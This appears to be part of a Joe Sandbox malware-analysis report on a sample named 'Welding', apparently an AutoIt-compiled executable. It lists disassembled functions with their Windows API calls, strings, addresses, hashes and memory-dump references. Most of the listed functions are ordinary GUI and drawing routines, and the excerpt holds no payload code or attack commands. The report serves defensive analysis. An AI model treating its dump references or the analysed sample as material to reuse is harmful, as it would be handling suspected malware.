CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00128236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00128255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00128277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00128464

Strings

DISPLAY, xrefs: 001282C7
static, xrefs: 0012815F, 001282B6
AutoIt v3, xrefs: 00128117
, xrefs: 001283EA

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$#418AdjustAllocClientCloseCopyDesktopDestroyHandleImageLockMessageReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2158968032-2373415609
Opcode ID: f3eb9ea4b9589511c68a1001dc0518656daf585eacca71d8ac0cdaa46bd1780a
Instruction ID: f9912342d38aba692806aefeff97b44250c7999538b6b2dae96e18846505cef1
Opcode Fuzzy Hash: f3eb9ea4b9589511c68a1001dc0518656daf585eacca71d8ac0cdaa46bd1780a
Instruction Fuzzy Hash: 98027D75900115EFDB15EFA5DC89EAE7BB9FF49310F048158FA15AB2A1CB30AD81CB60

Function 00133BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00140980), ref: 00133C65
IsWindowVisible.USER32(?), ref: 00133C89

Strings

SELECTSTRING, xrefs: 00133E44
GETCURRENTLINE, xrefs: 00133F2B
UNCHECK, xrefs: 00133EC1
EDITPASTE, xrefs: 00133F9D
HIDEDROPDOWN, xrefs: 00133D3E
DELSTRING, xrefs: 00133D87
ISCHECKED, xrefs: 00133E77
GETLINECOUNT, xrefs: 00133F04
CURRENTTAB, xrefs: 00133CFB
TABRIGHT, xrefs: 00133CDB
GETCURRENTCOL, xrefs: 00133F66
SHOWDROPDOWN, xrefs: 00133D1E
GETCURRENTSELECTION, xrefs: 00133E21
SENDCOMMANDID, xrefs: 00134018
FINDSTRING, xrefs: 00133DB4
TABLEFT, xrefs: 00133CC5
ADDSTRING, xrefs: 00133D54
SETCURRENTSELECTION, xrefs: 00133DF4
ISENABLED, xrefs: 00133CA9
CHECK, xrefs: 00133EAB
GETLINE, xrefs: 00133FD9
GETSELECTED, xrefs: 00133EE1
ISVISIBLE, xrefs: 00133C75

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 3c167b9bd5f84e37d99adc211017c2676bdffa373e365c35fc6ec55f44d98d4a
Instruction ID: 328622a5d3068557ff5439adfb6854bd40c6273eb4482161f5cb86a203145b9a
Opcode Fuzzy Hash: 3c167b9bd5f84e37d99adc211017c2676bdffa373e365c35fc6ec55f44d98d4a
Instruction Fuzzy Hash: 0CD16030204305DBCB08EF50C951AEEB7A6AF94354F114459F9966B3E3CB31EE4ACB96

Function 0013ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0013AC55
GetSysColorBrush.USER32(0000000F), ref: 0013AC86
GetSysColor.USER32(0000000F), ref: 0013AC92
SetBkColor.GDI32(?,000000FF), ref: 0013ACAC
SelectObject.GDI32(?,?), ref: 0013ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 0013ACE6
GetSysColor.USER32(00000010), ref: 0013ACEE
CreateSolidBrush.GDI32(00000000), ref: 0013ACF5
FrameRect.USER32(?,?,00000000), ref: 0013AD04
DeleteObject.GDI32(00000000), ref: 0013AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 0013AD56
FillRect.USER32(?,?,?), ref: 0013AD88
GetWindowLongW.USER32(?,000000F0), ref: 0013ADB3

Part of subcall function 0013AF18: GetSysColor.USER32(00000012), ref: 0013AF51
Part of subcall function 0013AF18: SetTextColor.GDI32(?,?), ref: 0013AF55
Part of subcall function 0013AF18: GetSysColorBrush.USER32(0000000F), ref: 0013AF6B
Part of subcall function 0013AF18: GetSysColor.USER32(0000000F), ref: 0013AF76
Part of subcall function 0013AF18: GetSysColor.USER32(00000011), ref: 0013AF93
Part of subcall function 0013AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0013AFA1
Part of subcall function 0013AF18: SelectObject.GDI32(?,00000000), ref: 0013AFB2
Part of subcall function 0013AF18: SetBkColor.GDI32(?,00000000), ref: 0013AFBB
Part of subcall function 0013AF18: SelectObject.GDI32(?,?), ref: 0013AFC8
Part of subcall function 0013AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0013AFE7
Part of subcall function 0013AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0013AFFE
Part of subcall function 0013AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0013B013

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 14ae6e5e6bb53d3508bb389d1d6becc0f5413fffe41dd9d33826d5fb7588b6a9
Instruction ID: d5463f9cf5302d44fba64be2ac2f47b05b7f7cecd3bca4635532bd05a63ce81f
Opcode Fuzzy Hash: 14ae6e5e6bb53d3508bb389d1d6becc0f5413fffe41dd9d33826d5fb7588b6a9
Instruction Fuzzy Hash: FFA19C76008301AFD7129F65DC08E6B7BA9FF89321F500A19FAA69A5F1C731D884CF52

Function 000B2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 000B3072
DeleteObject.GDI32(00000000), ref: 000B30B8
DeleteObject.GDI32(00000000), ref: 000B30C3
DestroyIcon.USER32(00000000,?,?,?), ref: 000B30CE
DestroyWindow.USER32(00000000,?,?,?), ref: 000B30D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 000EC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000EC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000ECBDE

Part of subcall function 000B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B2412,?,00000000,?,?,?,?,000B1AA7,00000000,?), ref: 000B1F76

SendMessageW.USER32(?,00001053), ref: 000ECC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000ECC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 000ECC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 000ECC53

Strings

0, xrefs: 000ECA72

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: ce89a39c65ffaced51e07397ef49e0b5000aa608476d93ebc03375c433431277
Instruction ID: d0fec22e9a8d9018338fc5aa490acc5976e4c2ae92af234a2a24b5c70dbf8043
Opcode Fuzzy Hash: ce89a39c65ffaced51e07397ef49e0b5000aa608476d93ebc03375c433431277
Instruction Fuzzy Hash: 2412AE30604241EFEB65DF25C894FA9B7E1BF09300F244569F985DB662CB32ED82CB91

Function 000C27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031

__wcsnicmp.LIBCMT ref: 000C286A
__wcsnicmp.LIBCMT ref: 000C287E
__wcsnicmp.LIBCMT ref: 000C2896
__wcsnicmp.LIBCMT ref: 000C28AE
__wcsnicmp.LIBCMT ref: 000C28C6
__wcsnicmp.LIBCMT ref: 000C28DE
__wcsnicmp.LIBCMT ref: 000C28F6
__wcsnicmp.LIBCMT ref: 000C290A
__wcsnicmp.LIBCMT ref: 000C2948
__wcsnicmp.LIBCMT ref: 000C295C
__wcsnicmp.LIBCMT ref: 000C2970
__wcsnicmp.LIBCMT ref: 000C2984

Strings

#pragma compile, xrefs: 000C2864
#include, xrefs: 000C28D8
#requireadmin, xrefs: 000C2890
', xrefs: 000FFB9F
Bad directive syntax error, xrefs: 000FFBD3, 000FFBF0
#include-once, xrefs: 000C28C0
#cs, xrefs: 000C2904, 000C2956
#ce, xrefs: 000C297E
Unterminated group of comments, xrefs: 000FFCFA
Cannot parse #include, xrefs: 000FFCE5
#comments-end, xrefs: 000C296A
#notrayicon, xrefs: 000C2878
#comments-start, xrefs: 000C28F0, 000C2942
#OnAutoItStartRegister, xrefs: 000C28A8
", xrefs: 000FFB89

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: b95f6070ab3b0ff8ad1320212bca22db7bd1ee22c7092649a1f9773d94307d83
Instruction ID: a34150119ef06c4ba4d8de4787dcdd2a6e16437ee7a6b31f8c52bd50c53de180
Opcode Fuzzy Hash: b95f6070ab3b0ff8ad1320212bca22db7bd1ee22c7092649a1f9773d94307d83
Instruction Fuzzy Hash: BBA19031A4020ABBCB20AF20DD52FBE77B5AF45740F14002DF905AB6A3EBB19A55D661

Function 00127B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00127BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00127C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00127CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00127CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00127D1D
GetClientRect.USER32(00000000,?), ref: 00127D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00127D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00127D7C
GetStockObject.GDI32(00000011), ref: 00127D8C
SelectObject.GDI32(00000000,00000000), ref: 00127D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00127DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00127DA9
DeleteDC.GDI32(00000000), ref: 00127DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00127DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00127DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00127E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00127E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00127E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00127E85
GetStockObject.GDI32(00000011), ref: 00127E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00127E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00127EA5

Strings

DISPLAY, xrefs: 00127D72
static, xrefs: 00127D67, 00127E7F
AutoIt v3, xrefs: 00127D15
msctls_progress32, xrefs: 00127E26

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 4996a9e484cb376ba4f579865f8fa0fa47b2cb3f047bbf6f1e76b27d99a9d3c2
Instruction ID: cd9079876b1e14fec48983f39a1a1801cfa88323f17128dec329c777e5ff5568
Opcode Fuzzy Hash: 4996a9e484cb376ba4f579865f8fa0fa47b2cb3f047bbf6f1e76b27d99a9d3c2
Instruction Fuzzy Hash: 7BA17EB1A40219BFEB14DBA5DC4AFAF7BB9EB09710F004114FA15A76E1C770AD90CB64

Function 0011B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0011B361
GetDriveTypeW.KERNEL32(?,00142C4C,?,\\.\,00140980), ref: 0011B43E
SetErrorMode.KERNEL32(00000000,00142C4C,?,\\.\,00140980), ref: 0011B59C

Strings

MMC, xrefs: 0011B55D
Removable, xrefs: 0011B490
Unknown, xrefs: 0011B45E, 0011B502
Virtual, xrefs: 0011B564
PhysicalDrive, xrefs: 0011B3EA
Network, xrefs: 0011B47C
FileBackedVirtual, xrefs: 0011B56B
Fibre, xrefs: 0011B52C
1394, xrefs: 0011B51E
CDROM, xrefs: 0011B472
RAID, xrefs: 0011B53A
ATA, xrefs: 0011B517
USB, xrefs: 0011B533
SSD, xrefs: 0011B4C9
SSA, xrefs: 0011B525
SAS, xrefs: 0011B548
RAMDisk, xrefs: 0011B468
iSCSI, xrefs: 0011B541
ATAPI, xrefs: 0011B510
\\.\, xrefs: 0011B3B3
SCSI, xrefs: 0011B509
SATA, xrefs: 0011B54F
Fixed, xrefs: 0011B486

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 55edb01b2be93d76f52aeadbcd0a722df00fab4ff7b2e2166d154d95cae62b07
Instruction ID: 799a1f83637652d095c7fc0c21d1a60d2dd26feb5463f1e16787a248e7a87bec
Opcode Fuzzy Hash: 55edb01b2be93d76f52aeadbcd0a722df00fab4ff7b2e2166d154d95cae62b07
Instruction Fuzzy Hash: 3C519034B4C609EBCB4CDB20CDC2AFC77A2AB49740B648035E406E72E2D771AED1DA51

Function 0013AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0013AF51
SetTextColor.GDI32(?,?), ref: 0013AF55
GetSysColorBrush.USER32(0000000F), ref: 0013AF6B
GetSysColor.USER32(0000000F), ref: 0013AF76
CreateSolidBrush.GDI32(?), ref: 0013AF7B
GetSysColor.USER32(00000011), ref: 0013AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0013AFA1
SelectObject.GDI32(?,00000000), ref: 0013AFB2
SetBkColor.GDI32(?,00000000), ref: 0013AFBB
SelectObject.GDI32(?,?), ref: 0013AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 0013AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0013AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 0013B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0013B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0013B086
InflateRect.USER32(?,000000FD,000000FD), ref: 0013B0A4
DrawFocusRect.USER32(?,?), ref: 0013B0AF
GetSysColor.USER32(00000011), ref: 0013B0BD
SetTextColor.GDI32(?,00000000), ref: 0013B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0013B0D9
SelectObject.GDI32(?,0013AC1F), ref: 0013B0F0
DeleteObject.GDI32(?), ref: 0013B0FB
SelectObject.GDI32(?,?), ref: 0013B101
DeleteObject.GDI32(?), ref: 0013B106
SetTextColor.GDI32(?,?), ref: 0013B10C
SetBkColor.GDI32(?,?), ref: 0013B116

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 33f9750adb8063ae882f27911c4a16e83c42411ccd71c7f94d1d324f4ae2f6eb
Instruction ID: d57763e2a016bd86e31ed7869bfd11887be3c3c8ed6a94b3b0812d894e8ed195
Opcode Fuzzy Hash: 33f9750adb8063ae882f27911c4a16e83c42411ccd71c7f94d1d324f4ae2f6eb
Instruction Fuzzy Hash: 31617C75900218BFDF169FA5DC48EAE7B79EF09320F114115FA15AB2A1D7719980CF90

Function 00138FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001390EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001390FB
CharNextW.USER32(0000014E), ref: 0013912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0013916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00139181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00139192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 001391AF
SetWindowTextW.USER32(?,0000014E), ref: 001391FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00139211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00139242
_memset.LIBCMT ref: 00139267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 001392B0
_memset.LIBCMT ref: 0013930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00139339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00139391
SendMessageW.USER32(?,0000133D,?,?), ref: 0013943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00139460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001394AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001394D7
DrawMenuBar.USER32(?), ref: 001394E6
SetWindowTextW.USER32(?,0000014E), ref: 0013950E

Strings

0, xrefs: 00139478

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: c70b2ac4c10774c682aaae6acfd65fc3e770e8c60ee415a28fed54c3918c2126
Instruction ID: 6c0e8cd5d0dc1432cf4cad8b87408e141f3d0e5124a1216deb2dd926aac08811
Opcode Fuzzy Hash: c70b2ac4c10774c682aaae6acfd65fc3e770e8c60ee415a28fed54c3918c2126
Instruction Fuzzy Hash: 30E1B175900209AFDF259F55CC88EEF7BBCEF09750F108156FA19AA291D7B08A81CF61

Function 00134ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00135007
GetDesktopWindow.USER32 ref: 0013501C
GetWindowRect.USER32(00000000), ref: 00135023
GetWindowLongW.USER32(?,000000F0), ref: 00135085
DestroyWindow.USER32(?), ref: 001350B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001350DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001350F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0013511E
SendMessageW.USER32(?,00000421,?,?), ref: 00135133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00135146
IsWindowVisible.USER32(?), ref: 00135166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00135181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00135195
GetWindowRect.USER32(?,?), ref: 001351AD
MonitorFromPoint.USER32(?,?,00000002), ref: 001351D3
GetMonitorInfoW.USER32(00000000,?), ref: 001351ED
CopyRect.USER32(?,?), ref: 00135204
SendMessageW.USER32(?,00000412,00000000), ref: 0013526F

Strings

(, xrefs: 001351E0
tooltips_class32, xrefs: 001350D3
0, xrefs: 00134FB2

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 7dfc0c93b752dc6e3f5fd5a6a4c185fe8cab575b78cf84b24d9d9a9e4aacae7d
Instruction ID: 6be34a5d75a76a16ac22a6054d083eee215a43991f32569b23a78236fdbc71f0
Opcode Fuzzy Hash: 7dfc0c93b752dc6e3f5fd5a6a4c185fe8cab575b78cf84b24d9d9a9e4aacae7d
Instruction Fuzzy Hash: EFB18C71604740AFD704DF65C848BABBBE5FF89710F008A1CF9999B2A2D771E845CB92

Function 000B2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B2C8C
GetSystemMetrics.USER32(00000007), ref: 000B2C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B2CBF
GetSystemMetrics.USER32(00000008), ref: 000B2CC7
GetSystemMetrics.USER32(00000004), ref: 000B2CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000B2D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000B2D19
